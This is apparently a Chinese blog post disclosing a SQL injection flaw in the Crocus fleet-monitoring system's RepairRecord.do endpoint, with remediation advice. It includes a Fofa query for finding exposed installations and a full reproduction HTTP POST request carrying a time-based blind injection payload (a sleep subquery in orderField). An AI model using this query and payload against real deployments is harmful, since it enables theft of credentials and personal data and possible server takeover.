首页 > 数据库 >锐明Crocus系统 RepairRecord.do SQL注入漏洞

锐明Crocus系统 RepairRecord.do SQL注入漏洞

时间:2024-10-10 17:46:46浏览次数:3  
标签:do 系统 Crocus 漏洞 SQL 攻击者 权限

0x01 产品描述:

       明锐技术是一家专注于AI和视频技术的商用车智能物联(AIoT)解决方案提供商,Crocus系统是其核心产品之一。该系统旨在利用人工智能、高清视频、大数据和自动驾驶技术,提高企业或车队的运营效率,帮助商用车减少交通事故和货物丢失。通过车载摄像头、毫米波雷达等传感器,Crocus系统能够实现对车辆周围环境的实时感知和监控,显著提升驾驶安全性。此外,利用AI技术,系统能够分析驾驶员的驾驶行为,并及时识别车辆和行人的身份,从而提醒驾驶员注意潜在风险。同时,Crocus系统还具备实时监控货箱状态的能力,包括跟踪货物是否丢失、检查货箱是否关闭等,通过3D检测技术实现更精准的货物识别和管理。

0x02 漏洞描述:

        明锐技术的Crocus系统中,RepairRecord.do接口存在SQL注入漏洞,这一漏洞使得经过身份验证的远程攻击者能够利用该接口进行恶意操作。攻击者可以通过SQL注入获取数据库中的敏感信息,例如管理员后台密码和用户个人信息。此外,在某些情况下,攻击者可能获得高权限,甚至能够向服务器写入shell脚本,从而进一步获取服务器的系统权限,导致更严重的安全风险

0x03 搜索语句:

Fofa:body="/ThirdResource/respond/respond.min.js" && title="Crocus"

0x04 漏洞复现:

POST /RepairRecord.do?Action=QueryLast HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Token: c3RyZWFtYXgyMDAyMDgxODoxNzI0NjM2OTQyMTA0Ljg4NDU=
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: Saffron.U=VUlEPTEmVU49c3RyZWFtYXgyMDAyMDgxOCZHSUQ9MTcyNDYzNjk0MjEwNC44ODQ1MTQmUklEPTEmTT1CTWFwJklOUz0x
Connection: close

EndTime=2024-08-20+00%3A00%3A00&PageIndex=0&PageSize=20&RepairState=-1&StartTime=2024-08-26+00%3A00%3A00&orderField=(select*from(select%0asleep(5))a)&orderType=asc

 

0x05 修复建议:

关闭互联网暴露面或接口设置访问权限。

建议对所有输入数据进行严格验证,并使用参数化查询。同时,应限制数据库用户的权限,仅授予执行必要操作所需的最低权限。定期进行安全审计,以发现并修复潜在的安全漏洞。

标签:do,系统,Crocus,漏洞,SQL,攻击者,权限
From: https://blog.csdn.net/xc_214/article/details/142784699

相关文章

  • 【Flink系列十八】Hudi hive_sync JDO报错 Could not find API definition for name "
    问题现象Error:CouldnotfindAPIdefinitionforname"JDO".Perhapsyoudonthavetherequisitedatanucleus-api-XXXjarintheCLASSPATH?2024-10-1011:12:31,251ERRORDataNucleus.Persistence[]-Error:Co......
  • Windows-WMI 事件 ID 10或0x80041003——解决过程
    2024年10月8日国庆节后,第一天上班,实验室里一台PC机出现故障,Windows7系统,可以正常启动进入安全模式,但是正常启动无法加载桌面,可以看见鼠标,Ctrl+Alt+Del无法调出任务管理器。开始处理,进入安全模式,查看系统日志。发现一个错误如下(截取自[https://www.cnblogs.com/longware/p/78231......
  • ThinkPHP5&bootstrap&MySQL开发学习平台(包括后台管理功能、PC端网页、移动端网页)手把
    一、项目预览(全部源码链接在最下面)功能及页面持续优化中......二、本地运行方式1、下载源码包进行解压(源码在最下面)2、下载phpstudy_pro,并运行Apache&......
  • Docker安装Nginx
    1.下载镜像文件dockerpullnginx2.创建挂载目录mkdir-p/docker/nginx/{conf,conf.d,html,logs}3.创建nginx.conf配置文件路径为:/docker/nginx/conf/nginx.confusernginx;worker_processes1;error_log/var/log/nginx/error.logwarn;pid/var/run/ngin......
  • hadoop伪分布式模式
    1.下载,上传,解压,配置环境变量2.修改配置文件2.1HDFScore-site.xml<configuration><property><name>fs.defaultFS</name><value>hdfs://localhost:9000</value></property></configuration>2.2NameNode......
  • MySQL之innodb_flush_log_at_trx_commit和sync_binlog
    innodb_flush_log_at_trx_commit和sync_binlog两个参数是控制MySQL磁盘写入策略以及数据安全性的关键参数,它们的配置对于mysql性能有很大的影响一、innodb_flush_log_at_trx_commitinnodb_flush_log_at_trx_commit:是InnoDB引擎特有的,ib_logfile的刷新方式(ib_logfile:存放In......
  • kms激活Windows
    安装KMS服务个人是在软路由系统中安装的,安装请另外寻找服务器安装KMS教程使用命令行进行激活1.卸载当前激活的秘钥(管理员启动命令行)slmgr/upk2.安装新的秘钥秘钥在KMS软件的日志中,自行寻找slmgr/ipkXXXX-XXXX-XXXXXX3.设置KMS服务器地址可以输入内网地址slmg......
  • mysql数据库--行级锁,间隙锁和临键锁详解
    转载链接地址:MySQL数据库——锁-行级锁(行锁、间隙锁和临键锁)介绍行级锁,每次操作锁住对应的行数据。锁定粒度最小,发生锁冲突的概率最低,并发度最高。应用在InnoDB存储引擎中。InnoDB的数据是基于索引组织的,行锁是通过对索引上的索引项加锁来实现的,而不是对记录加的锁。对于行级......
  • flask sqlalchemy 分页(二)
    page.html<!--这个是分页展示下面的页码-->{%macromy_paginate(pagination,url)%}<nav><ulclass="pagination">{%ifpagination.has_prev%}<liclass="page-itemactive"><aclass="page-link&......
  • MySQL调优指南及高级SQL技巧
    知识背景:相信大家在面试的时候都会遇到关于mysql调优的问题,这已经是必问的一环节了,特此在这边简单记录一些关于mysql调优的知识点,希望对大家有帮助!总体介绍:MySQL调优主要分为三个步骤:监控报警、 排查慢SQL、MySQL调优。监控报警:使用工具(如Prometheus+Grafana)监控MySQL,发......